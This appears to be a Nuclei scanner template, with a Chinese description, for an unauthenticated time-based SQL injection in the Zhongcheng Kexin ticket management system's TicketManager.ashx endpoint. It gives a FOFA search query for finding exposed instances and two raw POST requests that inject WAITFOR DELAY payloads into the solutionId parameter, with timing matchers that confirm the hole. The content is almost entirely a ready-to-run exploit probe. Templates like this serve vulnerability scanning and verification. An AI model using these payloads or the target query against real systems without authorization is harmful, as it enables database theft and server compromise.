id: zhongchengkexin-TicketManager-sql

info:
  name: 中成科信票务管理系统 TicketManager.ashx SQL延时注入
  author: Superhero
  severity: high
  description: |-
    fofa: icon_hash="1632964065" || icon_hash="-2142050529"
    中成科信票务管理系统 TicketManager.ashx 接口处存在SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息（例如管理员后台密码、站点用户个人信息）之外，攻击者甚至可以在高权限下向服务器写入命令，进一步获取服务器系统权限。
  reference:
    - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486372&idx=1&sn=c99f323e3324fe1ff4bc158ecdc87fce&chksm=c267be97f510378197ab8ab5af8eba56b928bacfb26ba818ff6a12a4e6d06c3e7d360f1ed089&token=661111678&lang=zh_CN#rd
  tags: sql injection



http:
  - raw:
      - |
        POST /SystemManager/Api/TicketManager.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: application/x-www-form-urlencoded

        Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:4'--

      - |
        POST /SystemManager/Api/TicketManager.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
        Content-Type: application/x-www-form-urlencoded

        Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:8'--

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=4 && duration_1<=5'  
          - 'duration_2>=8 && duration_2<=9'
        condition: and


 




